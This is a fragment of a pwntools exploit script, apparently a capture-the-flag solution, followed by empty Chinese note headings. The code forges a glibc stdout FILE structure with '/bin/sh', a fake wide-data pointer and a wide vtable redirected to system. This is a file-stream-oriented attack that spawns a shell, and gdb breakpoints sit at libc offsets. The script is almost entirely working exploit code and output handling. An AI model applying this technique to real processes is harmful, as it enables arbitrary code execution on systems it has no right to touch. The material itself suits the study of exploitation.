AUTOGDB and g.execute('b fileops.c:668') and sleep(T)
edit(11, payload1)
AUTOGDB and g.execute('p _IO_2_1_stdout_') and sleep(T)

payload2 = flat({
0x00: u64(b'/bin/sh\x00'),
0x08: libc_stdout, # _IO_read_ptr > readable address,
# or corrupu in fileops:537,
# return *(unsigned char *) fp->_IO_read_ptr;
0x38: libc_stdout,
0x40: libc_stdout, # _IO_buf_end > read n = 0,
0xa0: libc_stdout + 0xe0, # _wide_data > libc_stdout + 0xe0
0xc0: 0, # _mode < 0
0xe0: {
0xe0: libc_stdout - 0x8 - 0x20 # _wide_vtable > _IO_WUNDERFLOW -> system
}
}, filler=b"\x00")
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x8dfa8)}') and sleep(T) # system
r.send(payload2)

AUTOGDB and g.execute(f'b *{hex(libc_base + 0x936a5)}') and sleep(T) # ret
AUTOGDB and g.execute(f'b *{hex(libc_base + 0x59192)}') and sleep(T) # system

r.interactive()
r.close()

总结·

历史笔记·